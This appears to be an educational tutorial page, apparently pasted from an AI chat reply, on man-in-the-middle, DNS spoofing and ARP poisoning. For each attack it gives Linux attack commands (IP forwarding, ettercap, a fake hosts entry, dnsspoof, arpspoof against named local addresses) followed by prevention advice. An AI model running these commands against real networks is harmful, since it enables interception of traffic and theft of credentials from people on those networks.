Network Attacks
π₯ Network Attacks & Prevention with Implementation π¶
Network attacks exploit vulnerabilities in communication protocols to intercept, manipulate, or disrupt data. Below are some common attacks and how to implement/detect them.
1οΈβ£ Man-in-the-Middle (MitM) Attack π΄ββ οΈ¶
How It Works?¶
An attacker secretly intercepts communication between two parties to steal or alter data.
β
Example Attack: Using ettercap to perform an HTTPS MitM attack on a local network.
π΄ Attack Implementation (Linux)¶
# Enable IP forwarding (necessary for packet interception)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Launch Ettercap to perform MitM attack
ettercap -T -q -i eth0 -M arp:remote /192.168.1.1/ /192.168.1.100/
πΉ This forces victim (192.168.1.100) to send traffic through the attacker's machine.
π‘οΈ Prevention¶
β Avoid public Wi-Fi or use a VPN.
β Enable HTTPS & TLS encryption (Check for π icon in URLs).
β Use Multi-Factor Authentication (MFA).
β Use HSTS (HTTP Strict Transport Security) to prevent HTTPS downgrade attacks.
2οΈβ£ DNS Spoofing (DNS Cache Poisoning) π¶
How It Works?¶
Attackers modify DNS records to redirect users to fake websites and steal credentials.
β
Example Attack: Using dnsspoof to redirect a victimβs request to a malicious site.
π΄ Attack Implementation (Linux)¶
# Edit hosts file to fake a website (e.g., redirect google.com)
echo "192.168.1.200 google.com" >> /etc/hosts
# Run dnsspoof to poison DNS cache on the network
dnsspoof -i eth0
πΉ When the victim types google.com, they are redirected to 192.168.1.200 (malicious site).
π‘οΈ Prevention¶
β Use DNSSEC (DNS Security Extensions) to verify DNS responses.
β Flush DNS cache regularly (sudo systemd-resolve --flush-caches).
β Use trusted DNS providers (Google DNS: 8.8.8.8, Cloudflare DNS: 1.1.1.1).
3οΈβ£ ARP Poisoning (Address Resolution Protocol Spoofing) π‘¶
How It Works?¶
Attackers manipulate ARP tables to link their MAC address with a victimβs IP, allowing them to intercept or modify traffic.
β
Example Attack: Using arpspoof to redirect traffic through the attacker's machine.
π΄ Attack Implementation (Linux)¶
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Poison ARP cache of target 192.168.1.100 by making it think we are the router (192.168.1.1)
arpspoof -i eth0 -t 192.168.1.100 -r 192.168.1.1
πΉ Now all traffic from 192.168.1.100 is routed through the attacker's machine.
π‘οΈ Prevention¶
β Use static ARP entries for critical devices (arp -s <IP> <MAC>).
β Implement ARP Spoofing Detection tools like Arpwatch.
β Enable Port Security & Dynamic ARP Inspection (DAI) in network switches.
π Final Thoughts¶
These attacks show how easily network security can be compromised. The best defense is encryption, strong authentication, and continuous monitoring.
Would you like a script to detect and prevent ARP poisoning automatically? π